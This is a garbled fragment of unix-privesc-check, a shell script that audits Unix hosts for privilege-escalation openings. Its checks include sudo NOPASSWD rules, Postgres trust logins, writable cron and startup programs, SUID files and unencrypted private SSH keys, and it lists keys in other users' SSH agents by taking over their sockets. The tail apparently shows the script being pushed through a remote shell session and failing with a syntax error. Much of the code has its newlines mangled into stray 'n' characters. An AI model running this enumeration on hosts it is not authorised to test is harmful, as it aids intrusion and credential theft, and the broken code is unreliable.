    SUDO_NOPASSWD=`grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep NOPASSWD`
    if [ ! -z "$SUDO_NOPASSWD" ]; then
        echo "WARNING: Some users can use sudo without a password:"
        grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep NOPASSWD
    fi
else
    echo "File /etc/sudoers not present.  Skipping checks."
fi

section "Checking permissions on swap file(s)"
for SWAP in `swapon -s | grep -v '^Filename' | cut -f 1 -d ' '`; do
    check_perms "$SWAP is used for swap space." $SWAP root 
    check_read_perms "$SWAP is used for swap space." $SWAP root 
done

section "Checking programs run from inittab"
if [ -f "/etc/inittab" ] && [ -r "/etc/inittab" ]; then
    for FILE in `cat /etc/inittab | grep : | grep -v '^#' | cut -f 4 -d : | grep '/' | cut -f 1 -d ' ' | sort -u`; do
        check_called_programs "$FILE is run from /etc/inittab as root." $FILE root
    done
else
    echo "File /etc/inittab not present.  Skipping checks."
fi

section "Checking postgres trust relationships"
for DIR in $PGDIRS; do
    if [ -d "$DIR" ] && [ -r "$DIR/pg_hba.conf" ]; then
        grep -v '^#' "$DIR/pg_hba.conf" | grep -v '^[ \t]*$' | while read LINE
        do
            AUTH=`echo "$LINE" | awk '{print $NF}'`
            if [ "$AUTH" = "trust" ]; then
                PGTRUST=1
                echo "WARNING: Postgres trust configured in $DIR/pg_hba.conf: $LINE"
            fi
        done
    fi
done

PGVER1=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version`

if [ -n "$PGVER1" ]; then 
    PGTRUST=1
    echo "WARNING: Can connect to local postgres database as \"postgres\" without a password"
fi

PGVER2=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version`

if [ -n "$PGVER2" ]; then 
    PGTRUST=1
    echo "WARNING: Can connect to local postgres database as \"pgsql\" without a password"
fi

if [ -z "$PGTRUST" ]; then
    echo "No postgres trusts detected"
fi

# Check device files for mounted file systems are secure
# cat /proc/mounts | while read LINE # Doesn't work so well when LVM is used - need to be root
section "Checking permissions on device files for mounted partitions"
if [ "$OS" = "linux" ]; then
    mount | while read LINE
    do
        DEVICE=`echo "$LINE" | awk '{print $1}'`
        FS=`echo "$LINE" | awk '{print $5}'`
        if [ "$FS" = "ext2" ] || [ "$FS" = "ext3" ] ||[ "$FS" = "reiserfs" ]; then
            echo "Checking device $DEVICE"
            check_perms "$DEVICE is a mounted file system." $DEVICE root
        fi
    done
elif [ "$OS" = "bsd" ]; then
    mount | grep ufs | while read LINE
    do
        DEVICE=`echo "$LINE" | awk '{print $1}'`
        echo "Checking device $DEVICE"
        check_perms "$DEVICE is a mounted file system." $DEVICE root
    done
elif [ "$OS" = "solaris" ]; then
    mount | grep xattr | while read LINE
    do
        DEVICE=`echo "$LINE" | awk '{print $3}'`
        if [ ! "$DEVICE" = "swap" ]; then
            echo "Checking device $DEVICE"
            check_perms "$DEVICE is a mounted file system." 
$DEVICE rootn fin donenelif [ "$OS" = "hpux" ]; thenn mount | while read LINEn don DEVICE=`echo "$LINE" | awk '{print $3}'`n C=`echo $DEVICE | cut -c 1`n if [ "$C" = "/" ]; thenn echo "Checking device $DEVICE"n check_perms "$DEVICE is a mounted file system." $DEVICE rootn fin donenn NFS=`mount | grep NFS`n if [ -n "$NFS" ]; thenn echo "WARNING: This system is an NFS client. Check for nosuid and nodev options."n mount | grep NFSn finfinn# Check cron jobs if they're readablen# TODO check that cron is actually runningnsection "Checking cron job programs aren't writable (/etc/crontab)"nCRONDIRS=""nif [ -f "/etc/crontab" ] && [ -r "/etc/crontab" ]; thenn MYPATH=`grep '^PATH=' /etc/crontab | cut -f 2 -d = `n echo Crontab path is $MYPATHnn # Check if /etc/cron.(hourly|daily|weekly|monthly) are being usedn CRONDIRS=`grep -v '^#' /etc/crontab | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | grep run-crons`nn # Process run-partsn grep -v '^#' /etc/crontab | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | grep run-parts | while read LINEn don echo "Processing crontab run-parts entry: $LINE"n USER=`echo "$LINE" | awk '{print $6}'`n DIR=`echo "$LINE" | sed 's/.*run-parts[^()&|;/]*(/[^ ]*).*/1/'`n check_perms "$DIR holds cron jobs which are run as $USER." "$DIR" "$USER"n if [ -d "$DIR" ]; thenn echo " Checking directory: $DIR"n for FILE in $DIR/*; don FILENAME=`echo "$FILE" | sed 's/.*///'`n if [ "$FILENAME" = "*" ]; then n echo " No files in this directory."n continuen fin check_called_programs "$FILE is run by cron as $USER." "$FILE" "$USER"n donen fin donenn # TODO bsd'd periodic:n # 1 3 * * * root periodic dailyn # 15 4 * * 6 root periodic weeklyn # 30 5 1 * * root periodic monthlynn grep -v '^#' /etc/crontab | grep -v '^[ ]*$' | grep '[ ][^ ][^ ]*[ ][ ]*' | while read LINEn do n echo "Processing crontab entry: $LINE"n USER=`echo "$LINE" | awk '{print $6}'`n PROG=`echo "$LINE" | awk '{print $7}'`n check_called_programs "$PROG is run from crontab as $USER." 
$PROG $USER $MYPATHn donenelsen echo "File /etc/crontab not present. Skipping checks."nfinn# Do this if run-crons is run from /etc/crontabnif [ -n "$CRONDIRS" ]; thenn USER=`echo "$CRONDIRS" | awk '{print $6}'`n section "Checking /etc/cron.(hourly|daily|weekly|monthly)"n for DIR in hourly daily weekly monthly; don if [ -d "/etc/cron.$DIR" ]; thenn echo " Checking directory: /etc/cron.$DIR"n for FILE in /etc/cron.$DIR/*; don FILENAME=`echo "$FILE" | sed 's/.*///'`n if [ "$FILENAME" = "*" ]; then n echo "No files in this directory."n continuen fin check_called_programs "$FILE is run via cron as $USER." "$FILE" $USERn donen fin donenfinnsection "Checking cron job programs aren't writable (/var/spool/cron/crontabs)"nif [ -d "/var/spool/cron/crontabs" ]; thenn for FILE in /var/spool/cron/crontabs/*; do n USER=`echo "$FILE" | sed 's/^.*///'`n if [ "$USER" = "*" ]; thenn echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks."n continuen fin echo "Processing crontab for $USER: $FILE"n if [ -r "$FILE" ]; thenn MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = `n if [ -n "$MYPATH" ]; thenn echo Crontab path is $MYPATHn fin grep -v '^#' "$FILE" | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | while read LINEn do n echo "Processing crontab entry: $LINE"n PROG=`echo "$LINE" | awk '{print $6}'`n check_called_programs "$PROG is run via cron as $USER." "$PROG" $USERn donen elsen echo "ERROR: Can't read file $FILE"n fin donenelsen echo "Directory /var/spool/cron/crontabs is not present. Skipping checks."nfinnsection "Checking cron job programs aren't writable (/var/spool/cron/tabs)"nif [ -d "/var/spool/cron/tabs" ]; thenn for FILE in /var/spool/cron/tabs/*; do n USER=`echo "$FILE" | sed 's/^.*///'`n if [ "$USER" = "*" ]; thenn echo "No user crontabs found in /var/spool/cron/crontabs. 
Skipping checks."n continuen fin echo "Processing crontab for $USER: $FILE"n if [ -r "$FILE" ]; thenn MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = `n if [ -n "$MYPATH" ]; thenn echo Crontab path is $MYPATHn fin grep -v '^#' "$FILE" | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | while read LINEn do n echo "Processing crontab entry: $LINE"n PROG=`echo "$LINE" | awk '{print $6}'`n check_called_programs "$PROG is run from cron as $USER." $PROG $USER $MYPATHn donen elsen echo "ERROR: Can't read file $FILE"n fin donenelsen echo "Directory /var/spool/cron/tabs is not present. Skipping checks."nfinn# Check programs run from /etc/inetd.conf have secure permissionsn# TODO: check inetd is actually runningnsection "Checking inetd programs aren't writable"nif [ -f /etc/inetd.conf ] && [ -r /etc/inetd.conf ]; thenn grep -v '^#' /etc/inetd.conf | grep -v '^[ t]*$' | while read LINEn do n USER=`echo $LINE | awk '{print $5}'`n PROG=`echo $LINE | awk '{print $6}'` # could be tcpwappers ...n PROG2=`echo $LINE | awk '{print $7}'` # ... and this is the real progn if [ -z "$PROG" ] || [ "$PROG" = "internal" ]; thenn # Not calling an external programn continuen fin echo Processing inetd line: $LINEn if [ -f "$PROG" ]; thenn check_called_programs "$PROG is run from inetd as $USER." $PROG $USERn fin if [ -f "$PROG2" ]; thenn check_called_programs "$PROG is run from inetd as $USER." $PROG2 $USERn fin donenelsen echo "File /etc/inetd.conf not present. Skipping checks."nfinn# Check programs run from /etc/xinetd.d/*n# TODO: check xinetd is actually runningnsection "Checking xinetd programs aren't writeable"nif [ -d /etc/xinetd.d ]; thenn for FILE in `grep 'disable[ t]*=[ t]*no' /etc/xinetd.d/* | cut -f 1 -d :`; don echo Processing xinetd service file: $FILEn PROG=`grep '^[ t]*server[ t]*=[ t]*' $FILE | sed 's/.*server.*=[ t]*//'`n USER=`grep '^[ t]*user[ t]*=[ t]*' $FILE | sed 's/.*user.*=[ t]*//'`n check_called_programs "$PROG is run from xinetd as $USER." 
$PROG $USERn donenelsen echo "Directory /etc/xinetd.d not present. Skipping checks."nfinn# Check for writable home directoriesnsection "Checking home directories aren't writable"ncat /etc/passwd | grep -v '^#' | while read LINEndon echo Processing /etc/passwd line: $LINEn USER=`echo $LINE | cut -f 1 -d :`n DIR=`echo $LINE | cut -f 6 -d :`n SHELL=`echo $LINE | cut -f 7 -d :`n if [ "$SHELL" = "/sbin/nologin" ] || [ "$SHELL" = "/bin/false" ]; thenn echo " Skipping user $USER. They don't have a shell."n elsen if [ "$DIR" = "/dev/null" ]; thenn echo " Skipping /dev/null home directory"n elsen check_perms "$DIR is the home directory of $USER." $DIR $USERn fin findonenn# Check for readable files in home directoriesnsection "Checking for readable sensitive files in home directories"ncat /etc/passwd | while read LINEndon USER=`echo $LINE | cut -f 1 -d :`n DIR=`echo $LINE | cut -f 6 -d :`n SHELL=`echo $LINE | cut -f 7 -d :`n for FILE in $HOME_DIR_FILES; don if [ -f "$DIR/$FILE" ]; thenn check_read_perms "$DIR/$FILE is in the home directory of $USER." "$DIR/$FILE" $USER n fin donendonennsection "Checking SUID programs"nif [ "$MODE" = "detailed" ]; thenn for FILE in `find / -type f -perm -04000 2>/dev/null`; don check_called_programs_suid $FILE n donenelsen echo "Skipping checks of SUID programs (it's slow!). 
Run again in 'detailed' mode."nfinn# Check for private SSH keys in home directoriesnsection "Checking for Private SSH Keys home directories"nfor HOMEDIR in `cut -f 6 -d : /etc/passwd`; do n if [ -d "$HOMEDIR/.ssh" ]; then n PRIV_KEYS=`grep -l 'BEGIN [RD]SA PRIVATE KEY' $HOMEDIR/.ssh/* 2>/dev/null`n if [ -n "$PRIV_KEYS" ]; then n for KEY in $PRIV_KEYS; don ENC_KEY=`grep -l 'ENCRYPTED' "$KEY" 2>/dev/null`n if [ -n "$ENC_KEY" ]; thenn echo "WARNING: Encrypted Private SSH Key Found in $KEY"n elsen echo "WARNING: Unencrypted Private SSH Key Found in $KEY"n fin donen fin fi ndonenn# Check for public SSH keys in home directoriesnsection "Checking for Public SSH Keys home directories"nfor HOMEDIR in `cut -f 6 -d : /etc/passwd`; do n if [ -r "$HOMEDIR/.ssh/authorized_keys" ]; then n KEYS=`grep '^ssh-' $HOMEDIR/.ssh/authorized_keys 2>/dev/null`n if [ -n "$KEYS" ]; then n echo "WARNING: Public SSH Key Found in $HOMEDIR/.ssh/authorized_keys"n fin fi ndonenn# Check for any SSH agents running on the boxnsection "Checking for SSH agents"nAGENTS=`ps -ef | grep ssh-agent | grep -v grep`nif [ -n "$AGENTS" ]; thenn echo "WARNING: There are SSH agents running on this system:"n ps -ef | grep ssh-agent | grep -v grepn # for PID in `ps aux | grep ssh-agent | grep -v grep | awk '{print $2}'`; don for SOCK in `ls /tmp/ssh-*/agent.* 2>/dev/null`; don SSH_AUTH_SOCK=$SOCK; export SSH_AUTH_SOCKn AGENT_KEYS=`ssh-add -l | grep -v 'agent has no identities.' 
2>/dev/null`n if [ -n "$AGENT_KEYS" ]; thenn echo "WARNING: SSH Agent has keys loaded [SSH_AUTH_SOCK=$SSH_AUTH_SOCK]"n ssh-add -ln fin donenelsen echo "No SSH agents found"nfinn# Check for any GPG agents running on the boxnsection "Checking for GPG agents"nAGENTS=`ps -ef | grep gpg-agent | grep -v grep`nif [ -n "$AGENTS" ]; thenn echo "WARNING: There are GPG agents running on this system:"n ps aux | grep gpg-agent | grep -v grepnelsen echo "No GPG agents found"nfinn# Check files in /etc/init.d/* can't be modified by non-root usersnsection "Checking startup files (init.d / rc.d) aren't writable"nfor DIR in /etc/init.d /etc/rc.d /usr/local/etc/rc.d; don if [ -d "$DIR" ]; thenn for FILE in $DIR/*; don F=`echo "$FILE" | sed 's/^.*///'`n if [ "$F" = "*" ]; thenn echo "No user startup script found in $DIR. Skipping checks."n continuen fin echo Processing startup script $FILEn check_called_programs "$FILE is run by root at startup." $FILE rootn donen findonennsection "Checking if running programs are writable"nif [ $OS = "solaris" ]; thenn # use the output of ps commandn ps -ef -o user,comm | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n PROG=`echo "$LINE" | awk '{print $2}'`n check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER"n donenelif [ $OS = "bsd" ]; thenn # use the output of ps commandn ps aux | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n PROG=`echo "$LINE" | awk '{print $11}'`n check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER"n donenelif [ $OS = "hpux" ]; thenn # use the output of ps commandn ps -ef | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n PROG1=`echo "$LINE" | awk '{print $8}'`n PROG2=`echo "$LINE" | awk '{print $9}'`n if [ -f "$PROG1" ]; thenn check_called_programs "$PROG is currently running as $USER." "$PROG1" "$USER"n fin if [ -f "$PROG2" ]; thenn check_called_programs "$PROG is currently running as $USER." 
"$PROG2" "$USER"n fin donenelif [ $OS = "linux" ]; thenn # use the /proc file systemn for PROCDIR in /proc/-9]*; do n unset PROGPATHn PID=`echo $PROCDIR | cut -f 3 -d /`n echo ------------------------n echo "PID: $PID"n if [ -d "$PROCDIR" ]; thenn if [ -r "$PROCDIR/exe" ]; thenn PROGPATH=`ls -l "$PROCDIR/exe" 2>&1 | sed 's/ (deleted)//' | awk '{print $NF}'`n elsen if [ -r "$PROCDIR/cmdline" ]; thenn P=`cat $PROCDIR/cmdline | tr "0" = | cut -f 1 -d = | grep '^/'`n if [ -z "$P" ]; thenn echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline`n elsen PROGPATH=$Pn fin elsen echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline`n continuen fin fin get_owner $PROCDIR; OWNER=$GET_OWNER_RETURNn echo "Owner: $OWNER"n elsen echo "ERROR: Can't find OWNER. Process has gone."n continuen fin n if [ -n "$PROGPATH" ]; thenn get_owner $PROGPATH; PROGOWNER=$GET_OWNER_RETURNn echo "Program path: $PROGPATH"n check_called_programs "$PROGPATH is currently running as $OWNER." $PROGPATH $OWNERn finn if [ "$MODE" == "detailed" ]; thenn for FILE in $PROCDIR/fd/*; don F=`echo "$FILE" | sed 's/^.*///'`n if [ "$F" = "*" ]; thenn continuen fin check_perms "$FILE is an open file descriptor for process $PID running as $OWNER." $FILE $OWNERn donen fin donenfin" >script; ./script > log' on shell session 1 (192.168.26.134) sh: line 11: syntax error near unexpected token `(' sh: line 11: `echo -e "#!/bin/shn# unix-privesc-check - Checks Unix system for simple privilege escalationsn# Copyright (C) 2008 pentestmonkey@pentestmonkey.netn#n#n# Licensen# -------n# This tool may be used for legal purposes only. Users take full responsibilityn# for any actions performed using this tool. The author accepts no liabilityn# for damage caused by this tool. 